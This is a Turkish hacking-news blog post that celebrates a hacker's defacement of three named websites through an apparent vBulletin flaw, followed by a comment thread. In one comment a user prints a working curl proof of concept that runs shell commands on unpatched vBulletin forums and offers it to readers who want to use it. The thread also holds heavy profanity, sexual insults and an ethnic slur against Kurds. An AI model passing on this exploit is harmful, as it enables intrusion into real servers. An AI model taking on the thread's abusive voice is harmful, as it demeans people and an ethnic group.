Hack Haber

Monzera’dan ortaya karışık saldırı!

Monzera kod adlı Türk hacker, ortaya karışık üç internet sitesine saldırı düzenledi.

Saldırıda dikkat çeken bir site var ki, Sahra demokratik arap devleti’nin forum sitesi geçtiğimiz günlerde ortaya çıkan vBulletin kaynaklı bir güvenlik açığından faydalandığını düşündüğümüz yöntem ile saldırılar gelmiş. Muhtemelen açık fixlendi ama güncellenme yapılmadığı sürece daha nice forum siteleri tehlike altında olduğunu varsayıyoruz.

Monzera tarafından yapılan siber saldırının kayıtları;

https://forum.vmedia.ca/

https://mirror-h.org/zone/2671209/

http://zone-h.org/mirror/id/34115591

Sahra Demokratik Arap Devleti En Büyük Forumu

https://www.shneler.com/

http://archive.is/LQDUF

http://zone-h.org/mirror/id/34116107

https://mirror-h.org/zone/2671234/

Jamai Ajans ve Magazin Sitesi

https://jamaicans.com/

https://mirror-h.org/zone/2671331/

http://zone-h.org/mirror/id/34116500

  1. Sağlık, Demek istediğini gayet güzel bir nezih bir şekilde idrak ettim. Şöyle bir şey varki bu 0day 2019 yılında yayıldı script veya botu nacizane kullandığın ortada böyle bir yola gelemezsin zaten. Hack dediğimiz 0day’den ibaret değildir daha sql xss ve rcı çıkan bir sürü sistem var sanalda buda vbulletin gözden kaçırdığı bir rcı açığıdır bunun yayılmasın’dan itibaren bir çok firma bu zeroday ile hacklenerek firmalarını lekelediler sana şu kadar diyebilirim hacki bir scripte site koymakla sınıyorsan yorum yaparak zamanını heba etme script kullanmaya devam et etki insanlar bu yorumunu görüp öflemesinler sanalda hayla böyle insanlar kaldı mı diye neyse beni ilgilendirmez sana yayın hayatında başarılar dilerim gardeşim benim.

    Beğen

    1. amk lameri , pythonda post datayla gönderdiğin postu burpla gönderdin hackermi oldun , aptal. Otomatik shell atıp açığı fixleyen araç yazdım. Hala boş boş konuşuyor burada 😀

      Beğen

  2. Arkadaşlar 7/24 uyuyan bir insan değilim genelde sabahlıyorum. Tabi bu sırada kafam dolu oluyor + buraya yorum atıp açıklamada yapınca kafam gidiyor. Rcı açığı diye belirttiğim=Remote Code Evaluation zaten bir çok bilgi makale mevcut google aracılığı ile konu hakkında istediğiniz bilgiye erişebilirsiniz hayırlı günler herkese.

    Beğen

  3. Sağlık, az delikanlı olsan kendi nickinle yazarsın bende itimatı senden keserim kesin yakınım’dan birisin lamer falan demeler havalara girmeler. Ağzınız torba değilki büzelim. Neyse burda caz yapanlar. Maçı galibiyetle bitiremeyip boş yapanlar. Madem açığı fixlicek bir script yazabilme kabiliyetin var. Burda caz yapma hazır botlar kullanıp yola gelemeyip burda yok onu bunu yaptım diye geçinme. Bu arada sadece burp yok orda farkındaysan bir tarayıcıda mevcut anliyacağın senin seviyene inip bende küfür ederdim ama kusura bakma ben senin ve senin gibiler gibi ona buna caz yapıcak biri değilim.

    Beğen

  4. Sağlık, denilen lamerlikte master yapmış arkadaşımız gerçek nickini saklayarak yazıyor. Yok Python postuymuşta falan filanda bırak bu işleri pythonla alakası yok python ne alaka (; iyide sallıyorsun maşallağın var :d Aramızdaki farkları anlayıp sövmen hele beni dahada heveslendiriyor hacke. kendi yaptığı script varmış ahuahuauhuaha bana lamer diyen kişi python postunu burpa yansıttığımı belirtiyor (; neyse sen onun bunun scriptini sağiplen kardeşim benim. Nickinin olgunluğunu veremiyorsun yaşına bırakıyorum.

    Beğen

    1. amk beyinsizi , daha exploişt için yayınlanan PoC lardan haberi yok bash için curl ile çalışan bir PoC pythonla çalışan ayrı bir PoC yayınlandı ,

      exploiti sana kim öğrettiyse git sor ona nerden aldığını , ezbere yapmayın oğlum her şeyi acık araştırın 😀

      Beğen

  5. Yav sağlık senin hayli haysiyetini skerim lan amın cocugu illa ağzımızı cümlemizimi bozalım aq veled-i zinası seni exploiti bana kimse öğretmedi hali hazır exploit poclar’dan bahsediyorsun 0dayin daha ne olduğunu bilmeyip ordan burdan kullandığın exploitleri gelip bana haber yapılan bir konuda yok zaten yayılmıştı ayagına girme senin ananı skerim tamam mı sabır ediyorum ediyorum en sonunda sövdürüyorsunuz amına kodumun lamerleri yapabileceğiniz tek şey boş boş yorum bu arada ezber yapan yok öğretenlerede senin gibi bir lamer’in sözüne itimat edip yazıcak değilim gülüm benim yaşımın yetmediği yerde aklım yeter senin sıfatını sikeyim ben amına kodumun lameri daha post yansıtmayı bilmeyip hayli hazırda exploit kullanan lamer seni sq köşene amın asosyali seni.

    Beğen

  6. büyük ihtimal ya z3r0fy ya da chain sensin ezbere diyip geçiniyorsun herkese bide sanalı piyasayı bıraktım diyordun yaz kendi kendine amına kodumun lameri bide beyinsiz diyor anasını minareye kaldırıp imam karısı yapıp ağzına şelale gibi akıttgımın cocuguna bak 😀 size lamerlikte destan yazmaya kolaylıklar dilerim az deliklanlı olunda gerçek nickinizle yazın.

    Beğen

  7. bu pocu al bacının mahkul bir yerine sokarsın sağlık z3r0mu desem chain mi desem
    POC: curl -s http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d ‘subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'

    Ayrıca PoC dan falan bahsediyor amıcık.
    html,python,bash,perl gibi programlara ait scriptleri internetten bulabilirsiniz bu amına koydugumun 0 Iq orospusuda burda karı gibi yazsın dursun. Yorumları okuyup exploiti çalıştırıcak arkadaşlar için manual pocu sundum size bu ortalık orospusu arkadaşa gelince. Ey ulu lamer orospu evladı aklın varsa sanal'dan siktirip gidersin gitmezsende her yerde ezilip ananın amına kavuşturulursun. tekrar hazır scriptlerle baş başa bırakıyorum seni. Türk Kürt kardeştir ama bu orospu evladı benim kardeşim değildir Kürt Orospu cocugu çok yazıyorda boş yazıyor cevabıda alır paşa paşa oturur yerinde umarım yoksa kafasına göre sikime kadar yolu var.

    Beğen

Bir Cevap Yazın

Aşağıya bilgilerinizi girin veya oturum açmak için bir simgeye tıklayın:

WordPress.com Logosu

WordPress.com hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap /  Değiştir )

Google fotoğrafı

Google hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap /  Değiştir )

Twitter resmi

Twitter hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap /  Değiştir )

Facebook fotoğrafı

Facebook hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap /  Değiştir )

Connecting to %s

%d blogcu bunu beğendi: